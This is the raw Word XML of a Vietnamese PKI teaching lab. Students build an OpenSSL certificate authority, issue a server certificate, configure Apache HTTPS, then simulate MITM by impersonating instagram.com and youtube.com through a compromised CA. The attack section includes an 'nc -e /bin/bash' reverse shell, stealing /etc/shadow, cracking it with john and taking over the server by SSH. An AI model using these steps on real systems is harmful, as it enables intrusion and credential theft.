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35C0" w14:textId="63966541" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1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bookmarkStart w:id="0" w:name="_Toc152943448"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>BÀI</w:t>
      </w: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 xml:space="preserve"> THỰC HÀNH: PKI-LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635A652E" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRPr="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00CA1536">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:outlineLvl w:val="1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p w14:paraId="46AB061A" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="256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đích</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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A160005" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:firstLine="270"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc150545656"/>
      <w:bookmarkStart w:id="2" w:name="_Toc150545742"/>
      <w:bookmarkStart w:id="3" w:name="_Toc151395039"/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PKI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PKI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MITM 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vỡ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End w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="290B7ADD" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="256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4" w:name="_Toc152943449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bookmarkEnd w:id="4"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="387528DB" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:firstLine="27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Toc151395041"/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Linux,có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tầng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PKI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="01AD38B9" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="256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6" w:name="_Toc152943450"/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hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D65B88B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bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72659432" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:ind w:left="36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imodule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https://github.com/congtoan123/labtainer-ptit-pki/raw/main/imodule.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF34211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lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383A626A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terminal,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DE46FD" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="1832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labtainer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-r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ptit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-pki-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED2458" w14:textId="1F01F3E8" w:rsidR="002D0E9E" w:rsidRPr="002D0E9E" w:rsidRDefault="002D0E9E" w:rsidP="002D0E9E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ý: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tin email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lab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14562085" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:ind w:left="709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kpi_lab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, một máy là attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A422B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CA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3939C6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máy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server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1D6A25B7" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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PKI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demoCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C35AD95" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr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demoCA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cert,crl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,newcerts,index.txt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serial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1000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0250E747" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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mkdir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PKI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C54078" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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>cd PKI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4725D8" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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mkdir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demoCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A83AFC1" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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 xml:space="preserve">cd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demoCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48FA4240" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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mkdir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certs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crl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newcerts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43CC6180" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:ind w:left="567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>touch index.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C53396" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr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  <w:t>echo 1000&gt;serial</w:t>
      </w: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258AAEE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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ssl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openssl.cnf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PKI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA23119" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:ind w:left="2160"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cp “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usr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/lib/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ssl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openssl.cnf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” “/home/ubuntu/PKI”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F424E3D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2DC08946" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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openssl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req -x509 -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newkey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rsa:4096 -sha256 -days 3650 -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keyout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ca.key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-out ca.crt -subj "/C=VN/ST=HN/L=HD/O=PTIT/OU=ATTT/CN=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&lt;MSV&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>" -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passout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pass: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&lt; your password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F19DF" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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317058E1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Kiểm tra thông tin chứng chỉ gốc và khóa bí mật:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E738D" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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openssl x509 -in ca.crt -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B73AA75" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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lastRenderedPageBreak/>
        <w:t>openssl rsa -in ca.key -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F3A39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Tiếp theo ta sẽ tiến hành tạo chứng chỉ số cho máy chỉ PKILab.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73496FE0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(CSR)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PKILab.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6355D60A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6F012C99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openssl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req -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newkey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rsa:2048 -sha256 -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keyout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server.key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-out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server.csr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-subj "/C=VN/ST=HN/L=HD/O=PTIT/OU=ATTT/CN=PKILab.com" -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passout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pass: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&lt;your password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B18EA29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tra lại thông tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DBF50C" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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openssl req -in server.csr -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02549226" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:ind w:left="72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openssl rsa -in server.key -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0177658B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bằng chứng chỉ và khóa của CA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7F3FA4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openssl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ca -config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openssl.cnf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-policy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policy_anything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-md sha256 -days 3650 -in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server.csr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-out server.crt -batch -cert ca.crt -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keyfile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ca.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18B9659E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DNS map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localhost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trong</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C2C7A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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="05C30224" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="12"/>
        <w:ind w:left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cp</w:t>
      </w:r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server.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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server.pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2535CCF0" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:spacing w:before="13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cat</w:t>
      </w:r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server.crt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs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&gt;&gt;</w:t>
      </w:r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server.pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C03CCF6" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:spacing w:before="13"/>
        <w:ind w:firstLine="709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58DAAE91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SSL/TLS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5867C92A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openssl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s_server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-cert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server.pem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-www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D3DF4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B5E907B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firefox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có thể vào được web với giao thức https bằng chứng chỉ hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D9AC88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14:paraId="0ABC9BD3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bit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server.pem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0B2ACE5" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414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19F8C5B" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414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0D85D9F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Thiết lập máy chủ SSL/TLS đơn giản và quan sát :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C648B" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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openssl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s_server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-cert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server.pem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-www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFA02C8" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414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549AE23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sửa lại khóa bí mật trong file server.pem về cho đúng với ban </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>đầu</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="56AA5BBD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HTTPS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Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E587F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/var/www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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5DD1F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ssl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/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4060D810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/apache2/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ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E4DA392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Virtualhost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000-default.conf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dung :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6388F5FF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&lt;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VirtualHost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*:80&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18522F4D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ServerName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PKILAB.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ED5386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DocumentRoot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/var/www/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pki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62A9F825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DirectoryIndex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index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA193AF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&lt;/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VirtualHost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2AAB7E29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Virtualhost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default-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ssl.conf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13BFB7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VirtualHost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*:443&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AE9AA2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ServerName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PKILAB.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F19D0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DocumentRoot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/var/www/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pki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323DF5B0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DirectoryIndex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index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E073276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SSLEngine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On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4527A452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SSLCertificateFile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ab/>
        <w:t>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/apache2/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ssl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cert.pem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1CD7B442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SSLCertificateKeyFile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/apache2/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ssl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key.pem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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B12FB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&lt;/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VirtualHost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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0183FA35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Enable SSL module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apache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F22809F" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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a2enmod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ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29AD248A" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine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a2ensite default-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ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="725F79BA" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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sudo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systemctl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restart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</w:rPr>
        <w:t>apache2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="53CDCC3B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https://PKILab.com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firefox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và quan sát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920D06C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MITM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE882AC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serverName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default-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ssl.conf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instagram.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E9C63E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gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hosts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localhost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instagram.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7767167B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apache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truy cập </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r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https://instagram.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng firefox và quan sát chuyện gì sẽ xảy ra rồi sau đó thử truy cập </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r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http://instagram.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48D66458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Tiếp theo ta sẽ tiến hành tấn công MITM với CA bị khai thác và xem chuyện gì sẽ xảy ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D460F4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Trên máy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attacker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khởi động netcat lắng nghe kết nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65985A70" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr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nc -lnvp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D266D0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Trên máy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server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kết nối đến shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BEF129" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="bot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nc &lt;ip&gt; &lt;port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32368331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file shadow về máy và dùng john để crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053CBB6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Ssh vào chiếm quyền kiểm soát máy server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BAE7F2" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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MITM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2611F3B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host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youtube.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7FEFE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gốc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4EFE00C2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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/apache2/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ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="016FEBF2" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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Ánh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>xạ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localhost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youtube.com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apache2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và truy cập </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r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https://youtube.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên firefox và quan sát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB51BF" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563BD405" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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checkwork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0419BA2" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="288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lastRenderedPageBreak/>
        <w:t>checkwork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FFC6B31" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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terminal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lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A932BC" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880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Stoplab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="230C1A8F" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B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zip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quả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vị trí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stoplab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2263A5A2" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D60ED7" w14:textId="77777777" w:rsidR="00EA414B" w:rsidRDefault="00EA414B" w:rsidP="00EA414B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160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labtainer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-r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</w:rPr>
        <w:t>ptit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-pki-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC8E2B" w14:textId="77777777" w:rsidR="005A0233" w:rsidRPr="00EA414B" w:rsidRDefault="005A0233" w:rsidP="00EA414B"/>
    <w:sectPr w:rsidR="005A0233" w:rsidRPr="00EA4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D09CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAA6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9221B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34CE26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2B0A3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A8E4D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3D345BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3EC22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316E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9F8B2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19922240">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1962570804">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1583762493">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1627927849">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="12729811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3460948">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1473250004">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1068190704">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="156247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5"/>
    <w:rsid w:val="00125EC4"/>
    <w:rsid w:val="0014488D"/>
    <w:rsid w:val="00152E79"/>
    <w:rsid w:val="002D0E9E"/>
    <w:rsid w:val="005A0233"/>
    <w:rsid w:val="005B15E3"/>
    <w:rsid w:val="007B39EB"/>
    <w:rsid w:val="00847786"/>
    <w:rsid w:val="009B5745"/>
    <w:rsid w:val="00CA1536"/>
    <w:rsid w:val="00E31679"/>
    <w:rsid w:val="00EA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1017"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{71E282FD-4036-49F9-9FE4-E0AB503D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745"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr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745"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:aliases w:val="List A,Cấp1,List Paragraph 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009B5745"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListParagraphChar">
    <w:name w:val="List Paragraph Char"/>
    <w:aliases w:val="List A Char,Cấp1 Char,List Paragraph 1 Char"/>
    <w:link w:val="ListParagraph"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009B5745"/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b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stagram.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://instagra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Cong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Toan Cong</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-09T02:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-09T17:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>